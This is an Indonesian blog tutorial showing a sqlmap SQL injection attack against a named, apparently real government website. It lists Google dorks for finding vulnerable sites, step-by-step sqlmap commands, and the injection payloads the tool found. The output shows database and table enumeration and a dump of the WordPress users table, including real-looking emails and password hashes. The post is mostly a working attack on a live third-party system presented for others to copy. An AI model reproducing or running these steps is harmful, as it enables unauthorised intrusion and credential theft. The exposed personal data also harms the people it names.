Info BackTrack

Linux & Security Tutorial

SQL Injection Database Takeover Tool Dengan Sqlmap


Target : http://www.psf.gov.pk/

Sqli : http://www.psf.gov.pk/staffdetail.php?id=10′

Dork :


site:.com Warning: mysql_result():
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:"id=" & intext:"Warning: mysql_free_result()

–Step 1

python sqlmap.py -u http://www.psf.gov.pk/staffdetail.php?id=10 –dbs


lindo@laptop:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://www.psf.gov.pk/staffdetail.php?id=10 --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 13:47:23

[13:47:24] [INFO] using '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session' as session file
[13:47:24] [INFO] resuming injection data from session file
[13:47:24] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[13:47:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10' AND 4136=4136 AND 'TaeW'='TaeW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=10' AND (SELECT 2607 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,106,105,58),(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),CHAR(58,99,112,97,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'uqqS'='uqqS

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-5248' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,116,106,105,58),IFNULL(CAST(CHAR(89,67,100,70,74,83,98,109,101,86) AS CHAR),CHAR(32)),CHAR(58,99,112,97,58)), NULL# AND 'kgYE'='kgYE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=10' AND SLEEP(5) AND 'jFyF'='jFyF
---

[13:47:30] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0
[13:47:30] [INFO] fetching database names
[13:47:30] [INFO] read from file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session': information_schema, psfdb
available databases [2]:
[*] information_schema
[*] psfdb

[13:47:30] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk'

[*] shutting down at: 13:47:30

–Step 2.


lindo@laptop:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://www.psf.gov.pk/staffdetail.php?id=10 -D psfdb --tables

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:59:54

[16:59:54] [INFO] using '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session' as session file
[16:59:54] [INFO] resuming injection data from session file
[16:59:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:59:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10' AND 4136=4136 AND 'TaeW'='TaeW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=10' AND (SELECT 2607 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,106,105,58),(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),CHAR(58,99,112,97,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'uqqS'='uqqS

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-5248' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,116,106,105,58),IFNULL(CAST(CHAR(89,67,100,70,74,83,98,109,101,86) AS CHAR),CHAR(32)),CHAR(58,99,112,97,58)), NULL# AND 'kgYE'='kgYE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=10' AND SLEEP(5) AND 'jFyF'='jFyF
---

[17:00:00] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0
[17:00:00] [INFO] fetching tables for database 'psfdb'
[17:00:00] [INFO] read from file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session': psfdb, count, psfdb, descipline, psfdb, feedback, psfdb, jobs, psfdb, mantis_bug_file_table, psfdb, mantis_bug_history_table, psfdb, mantis_bug_monitor_table, psfdb, mantis_bug_relationship_table, psfdb, mantis_bug_revision_table, psfdb, mantis_bug_table, psfdb, mantis_bug_tag_table, psfdb, mantis_bug_text_table, psfdb, mantis_bugnote_table, psfdb, mantis_bugnote_text_table, psfdb, mantis_category_table, psfdb, mantis_config_table, psfdb, mantis_custom_field_project_table, psfdb, mantis_custom_field_string_table, psfdb, mantis_custom_field_table, psfdb, mantis_email_table, psfdb, mantis_filters_table, psfdb, mantis_news_table, psfdb, mantis_plugin_table, psfdb, mantis_project_file_table, psfdb, mantis_project_hierarchy_table, psfdb, mantis_project_table, psfdb, mantis_project_user_list_table, psfdb, mantis_project_version_table, psfdb, mantis_sponsorship_table, psfdb, mantis_tag_table, psfdb, mantis_tokens_table, psfdb, mantis_user_pref_table, psfdb, mantis_user_print_pref_table, psfdb, mantis_user_profile_table, psfdb, mantis_user_table, psfdb, newsletter, psfdb, organization, psfdb, pc1, psfdb, pi, psfdb, project, psfdb, staff, psfdb, staffarea, psfdb, staffawards, psfdb, staffpublication, psfdb, stafftraining, psfdb, state, psfdb, tblNews, psfdb, tenders, psfdb, test, psfdb, testpage, psfdb, travelgrant, psfdb, travelgrant_user, psfdb, user, psfdb, users_site, psfdb, wp_commentmeta, psfdb, wp_comments, psfdb, wp_links, psfdb, wp_options, psfdb, wp_postmeta, psfdb, wp_posts, psfdb, wp_term_relationships, psfdb, wp_term_taxonomy, psfdb, wp_terms, psfdb, wp_usermeta, psfdb, wp_users
Database: psfdb
[65 tables]
+-----------------------------------+
| count                             |
| descipline                        |
| feedback                          |
| jobs                              |
| mantis_bug_file_table             |
| mantis_bug_history_table          |
| mantis_bug_monitor_table          |
| mantis_bug_relationship_table     |
| mantis_bug_revision_table         |
| mantis_bug_table                  |
| mantis_bug_tag_table              |
| mantis_bug_text_table             |
| mantis_bugnote_table              |
| mantis_bugnote_text_table         |
| mantis_category_table             |
| mantis_config_table               |
| mantis_custom_field_project_table |
| mantis_custom_field_string_table  |
| mantis_custom_field_table         |
| mantis_email_table                |
| mantis_filters_table              |
| mantis_news_table                 |
| mantis_plugin_table               |
| mantis_project_file_table         |
| mantis_project_hierarchy_table    |
| mantis_project_table              |
| mantis_project_user_list_table    |
| mantis_project_version_table      |
| mantis_sponsorship_table          |
| mantis_tag_table                  |
| mantis_tokens_table               |
| mantis_user_pref_table            |
| mantis_user_print_pref_table      |
| mantis_user_profile_table         |
| mantis_user_table                 |
| newsletter                        |
| organization                      |
| pc1                               |
| pi                                |
| project                           |
| staff                             |
| staffarea                         |
| staffawards                       |
| staffpublication                  |
| stafftraining                     |
| state                             |
| tblNews                           |
| tenders                           |
| test                              |
| testpage                          |
| travelgrant                       |
| travelgrant_user                  |
| user                              |
| users_site                        |
| wp_commentmeta                    |
| wp_comments                       |
| wp_links                          |
| wp_options                        |
| wp_postmeta                       |
| wp_posts                          |
| wp_term_relationships             |
| wp_term_taxonomy                  |
| wp_terms                          |
| wp_usermeta                       |
| wp_users                          |
+-----------------------------------+

[17:00:00] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk'

[*] shutting down at: 17:00:00

–step 3


lindo@laptop:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://www.psf.gov.pk/staffdetail.php?id=10 -D psfdb -T wp_users --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 17:01:49

[17:01:49] [INFO] using '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session' as session file
[17:01:49] [INFO] resuming injection data from session file
[17:01:49] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:01:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10' AND 4136=4136 AND 'TaeW'='TaeW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=10' AND (SELECT 2607 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,106,105,58),(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),CHAR(58,99,112,97,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'uqqS'='uqqS

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-5248' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,116,106,105,58),IFNULL(CAST(CHAR(89,67,100,70,74,83,98,109,101,86) AS CHAR),CHAR(32)),CHAR(58,99,112,97,58)), NULL# AND 'kgYE'='kgYE

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=10' AND SLEEP(5) AND 'jFyF'='jFyF
---

[17:01:54] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0
[17:01:54] [INFO] fetching columns for table 'wp_users' on database 'psfdb'
[17:01:54] [INFO] read from file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session': ID, bigint(20) unsigned, user_login, varchar(60), user_pass, varchar(64), user_nicename, varchar(50), user_email, varchar(100), user_url, varchar(100), user_registered, datetime, user_activation_key, varchar(60), user_status, int(11), display_name, varchar(250)
[17:01:54] [INFO] fetching entries for table 'wp_users' on database 'psfdb'
[17:01:54] [INFO] read from file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/session': 2
[17:01:54] [INFO] the SQL query used returns 2 entries
Database: psfdb
Table: wp_users
[2 entries]
+--------------+----+---------------------+-------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
| display_name | ID | user_activation_key | user_email              | user_login | user_nicename | user_pass                          | user_registered     | user_status | user_url |
+--------------+----+---------------------+-------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
| usman        | 2  | NULL                | rockstone435@gmail.lcom | usman      | usman         | $P$Bq8UpfIraLpFskvJUf7zPsX30dMzOS. | 2012-09-10 09:06:59 | 0           | NULL     |
| admin        | 1  | NULL                | usmiusman@gmail.com     | admin      | admin         | $P$B5D2gwaEv6vhlACcaKQSniu17ROcMd0 | 2012-09-10 08:56:37 | 0           | NULL     |
+--------------+----+---------------------+-------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+

[17:02:00] [INFO] Table 'psfdb.wp_users' dumped to CSV file '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk/dump/psfdb/wp_users.csv'
[17:02:00] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.psf.gov.pk'

[*] shutting down at: 17:02:00

user_login = usman
user_pass = $P$Bq8UpfIraLpFskvJUf7zPsX30dMzOS.

user_login = admin
user_pass = $P$B5D2gwaEv6vhlACcaKQSniu17ROcMd0

–done

Terimakasih telah membaca artikel saya yang sederhana ini. Jika ada pertanyaan silahkan komen atau bisa PM saya. =))

greatz : Mama , Papa , dan Mendiang Tunangan Ku  (I don’t care other women).

create by Lindo.

Artikel Terkait:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: